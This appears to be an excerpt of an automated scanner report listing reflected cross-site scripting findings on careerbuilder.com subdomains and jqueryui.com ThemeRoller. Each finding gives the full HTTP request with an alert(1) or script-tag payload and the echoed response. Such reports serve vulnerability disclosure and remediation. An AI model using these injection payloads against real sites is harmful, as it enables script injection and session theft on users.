Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd998"%20a%3db%20b05fa222a32 was submitted in the lr parameter. This input was echoed as cd998" a=b b05fa222a32 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gv.ic/Florida_Miami/?lr=cbcb_mhcd998"%20a%3db%20b05fa222a32&SiteID=cbcb_mh093 HTTP/1.1
Host: gov.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 183263
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=ecdb0331cb464a329fd1c80ad18f7967-343070959-w2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650CC4B7FEBB57BA953BF422DB350B4E9BA73F80F19EB0362A5B01665D8C3627263610414ED49AA948E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:19 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:19 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 22:29:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhcd998" a=b b05fa222a32" />
...[SNIP]...

2.114. http://gov.careerbuilder.com/gv.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gov.careerbuilder.com
Path:   /gv.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ef3'-alert(1)-'1222dc2a568 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gv.ic/Florida_Miami/?lr=cbcb_mh61ef3'-alert(1)-'1222dc2a568&SiteID=cbcb_mh093 HTTP/1.1
Host: gov.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 183635
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=fe5cf099e2404089ab2ae0bf03c8cc69-343070985-w2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6504D3DF8B2F19A076E592FF6AA46ECF05B008D780A8FC101ADEA09DA48E869B6649FEEDA7F13873918; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:45 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:46 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 22:29:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh61ef3'-alert(1)-'1222dc2a568&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.115. http://human-resources.careerbuilder.com/hr.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://human-resources.careerbuilder.com
Path:   /hr.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a656a"%20a%3db%203feb96be110 was submitted in the lr parameter. This input was echoed as a656a" a=b 3feb96be110 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hr.ic/Florida_Miami/?lr=cbcb_mha656a"%20a%3db%203feb96be110&SiteID=cbcb_mh041 HTTP/1.1
Host: human-resources.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194193
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=1e5701970477412aa75465747cf51d58-343070973-VK-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650865DE06C3AE6A4BBB8F6A0661D0455222BAE02B5150F8E67A38F6CB311BAA009D670CCB1DAF5CA4A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:33 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:33 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 14 Nov 2010 22:29:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mha656a" a=b 3feb96be110" />
...[SNIP]...

2.116. http://human-resources.careerbuilder.com/hr.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://human-resources.careerbuilder.com
Path:   /hr.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba05'-alert(1)-'20bdb4e6d83 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hr.ic/Florida_Miami/?lr=cbcb_mh5ba05'-alert(1)-'20bdb4e6d83&SiteID=cbcb_mh041 HTTP/1.1
Host: human-resources.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194902
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=7bfbfd0022de40daa96f627df37564bf-343070993-RM-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6501E658FA81FEF0DB60921B25D8E4F2FE04403B3C7B2678EDE05E651406E1D89EA5E4984F4B9384687; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:53 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL22
Date: Sun, 14 Nov 2010 22:29:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh5ba05'-alert(1)-'20bdb4e6d83&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.117. http://information-technology.careerbuilder.com/it.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://information-technology.careerbuilder.com
Path:   /it.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54914"%20a%3db%2095f3352e48e was submitted in the lr parameter. This input was echoed as 54914" a=b 95f3352e48e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /it.ic/Florida_Miami/?lr=cbcb_mh54914"%20a%3db%2095f3352e48e&SiteID=cbcb_mh042 HTTP/1.1
Host: information-technology.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190767
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=1eebfb60fe96456d8a3b98a9516e4751-343070978-RB-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508E9F867635F13D3D0437D5790B86ED02ADDD09ED97BAA2FC74B7E92B73F8C7F44E1FFD0AA13E1555; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:37 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:38 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL11
Date: Sun, 14 Nov 2010 22:29:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh54914" a=b 95f3352e48e" />
...[SNIP]...

2.118. http://information-technology.careerbuilder.com/it.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://information-technology.careerbuilder.com
Path:   /it.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40fd5'-alert(1)-'67f3434df66 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it.ic/Florida_Miami/?lr=cbcb_mh40fd5'-alert(1)-'67f3434df66&SiteID=cbcb_mh042 HTTP/1.1
Host: information-technology.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191425
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=78df5155179941aab241f0efdb48ee86-343070998-RN-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650E36B0C4DEFC08F5BFE7A35E645C2838A9BCADFD76C078D6DE946337E6A1CF3E4E66BD1632AD26272; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:57 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:57 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL23
Date: Sun, 14 Nov 2010 22:29:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh40fd5'-alert(1)-'67f3434df66&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.119. http://jobs.careerbuilder.com/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://jobs.careerbuilder.com
Path:   /

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8fa"%20a%3db%2093e8de4ffcf was submitted in the lr parameter. This input was echoed as 5a8fa" a=b 93e8de4ffcf in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lr=cbcb_mhf48aa5a8fa"%20a%3db%2093e8de4ffcf HTTP/1.1
Host: jobs.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 214959
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=a65b5fb365ae44cc8b49eabc5ccc3421-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65071F320652C53B5FA10158B2D35DBDE6BFEC751AD5160D38F3BC3DA535E23566CDCE239E7AB373819; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:34:52 GMT; path=/; HttpOnly
Set-Cookie: CB%5FSID=83c8a36c2e2640f4b9534cdd2b31d1d8-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: CB%5FSID=7b43206340c54fa09d034e175604b78b-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL35
Date: Sun, 14 Nov 2010 23:34:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Search
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa5a8fa" a=b 93e8de4ffcf" />
...[SNIP]...

2.120. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd3ae"><script>alert(1)</script>e4b0ad6907f was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffffbd3ae"><script>alert(1)</script>e4b0ad6907f&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffffbd3ae"><script>alert(1)</script>e4b0ad6907f&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

2.121. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 852bb"><script>alert(1)</script>5966d356e19 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff852bb"><script>alert(1)</script>5966d356e19&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff852bb"><script>alert(1)</script>5966d356e19&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

2.122. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1fc"><script>alert(1)</script>492295ded91 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fe1fc"><script>alert(1)</script>492295ded91&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fe1fc"><script>alert(1)</script>492295ded91&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

2.123. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69302"><script>alert(1)</script>d38504ae62d was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec69302"><script>alert(1)</script>d38504ae62d&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec69302"><script>alert(1)</script>d38504ae62d&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

